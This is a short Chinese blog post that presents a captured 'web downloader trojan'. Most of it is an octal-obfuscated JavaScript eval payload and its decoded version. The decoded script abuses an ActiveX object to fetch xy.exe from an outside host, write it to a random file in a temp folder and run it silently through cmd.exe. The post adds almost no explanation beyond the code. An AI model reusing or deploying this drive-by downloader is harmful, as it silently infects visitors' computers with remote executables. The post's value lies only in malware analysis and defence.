又一个网页下载者木马

现在的位置: 首页 > 综合 > 正文

又一个网页下载者木马

2012年01月23日 ⁄ 综合 ⁄ 共 4315字 ⁄ 字号小中大 ⁄ 评论关闭

eval("\146\165\156\143\164\151\157\156\40\147\156\50\156\51\40\173\40\166\141\162\40\156\165\155\142\145\162\40\75\40\115\141\164\150\56\162\141\156\144\157\155\50\51\52\156\73\40\162\145\164\165\162\156\40\47\176\164\155\160\47\53\115\141\164\150\56\162\157\165\156\144\50\156\165\155\142\145\162\51\53\47\56\145\170\145\47\73\40\175\40\15\12\164\162\171\40\173\40\15\12\166\141\162\40\155\155\61\75\42\150\164\164\160\72\42\73\15\12\155\155\62\75\42\57\57\42\73\15\12\155\155\63\75\42\167\167\167\56\65\65\144\152\56\156\145\164\57\170\171\56\145\170\145\42\73\15\12\144\154\75\155\155\61\53\155\155\62\53\155\155\63\73\40\15\12\141\61\75\42\157\142\152\145\143\164\42\73\141\62\75\42\143\154\141\163\163\151\144\42\73\15\12\141\63\75\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\73\15\12\141\64\75\42\101\144\157\144\142\56\123\164\162\145\141\155\42\73\15\12\146\165\143\153\75\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\73\15\12\144\146\75\50\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\141\61\51\51\73\40\15\12\144\146\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\141\62\54\141\63\51\73\40\15\12\166\141\162\40\170\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\42\53\42\115\42\53\42\114\42\53\42\110\42\53\42\124\42\53\42\124\42\53\42\120\42\54\42\42\51\73\40\15\12\166\141\162\40\123\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\141\64\54\42\42\51\73\40\123\133\42\164\171\160\145\42\135\75\61\73\40\15\12\170\133\42\117\160\145\156\42\135\50\42\107\105\124\42\54\40\144\154\54\60\51\73\40\15\12\170\133\42\123\145\156\144\42\135\50\51\73\40\15\12\146\156\141\155\145\61\75\147\156\50\61\60\60\60\60\51\73\40\15\12\166\141\162\40\106\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\146\165\143\153\54\42\42\51\73\40\15\12\166\141\162\40\164\155\160\75\106\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\40\15\12\146\156\141\155\145\61\75\40\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\54\146\156\141\155\145\61\51\73\40\15\12\123\133\42\157\160\145\156\42\135\50\51\73\15\12\123\133\42\127\162\151\164\145\42\135\50\170\56\162\145\163\160\157\156\163\145\102\157\144\171\51\73\40\15\12\123\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\146\156\141\155\145\61\54\62\51\73\40\15\12\123\133\42\103\154\157\163\145\42\135\50\51\73\40\15\12\166\141\162\40\121\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\40\15\12\145\170\160\61\75\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\121\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\146\156\141\155\145\61\54\42\42\54\157\160\145\156\54\60\51\73\40\175\40\143\141\164\143\150\50\151\51\40\173\40\151\75\61\73\40\175")

</SCRIPT>

通过解码后:

function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; }

try {

var mm1="http:";

mm2="//";

mm3="www.55dj.net/xy.exe";

dl=mm1+mm2+mm3;

a1="object";a2="classid";

a3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";

a4="Adodb.Stream";

fuck="Scripting.FileSystemObject";

df=(window["document"]["createElement"](a1));

df["setAttribute"](a2,a3);

var x=df["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");

var S=df["CreateObject"](a4,""); S["type"]=1;

x["Open"]("GET", dl,0);

x["Send"]();

fname1=gn(10000);

var F=df["CreateObject"](fuck,"");

var tmp=F["GetSpecialFolder"](0);

fname1= F["BuildPath"](tmp,fname1);

S["open"]();

S["Write"](x.responseBody);

S["SaveToFile"](fname1,2);

S["Close"]();

var Q=df["CreateObject"]("Shell.Application","");

exp1=F["BuildPath"](tmp+'\\system32','cmd.exe');

Q["ShellExecute"](exp1,' /c '+fname1,"",open,0); } catch(i) { i=1; }

【上篇】Silverlight系列文章(整理)
【下篇】XOOPS模块开发快速入门中文翻译（四）

作者: flicker

该日志由 flicker 于12年前发表在综合分类下，最后更新于 2012年01月23日.
转载请注明: 又一个网页下载者木马 | 学步园 +复制链接

抱歉!评论已关闭.

学步园

又一个网页下载者木马

作者: flicker

书签

最新文章New

本站推荐

返回首页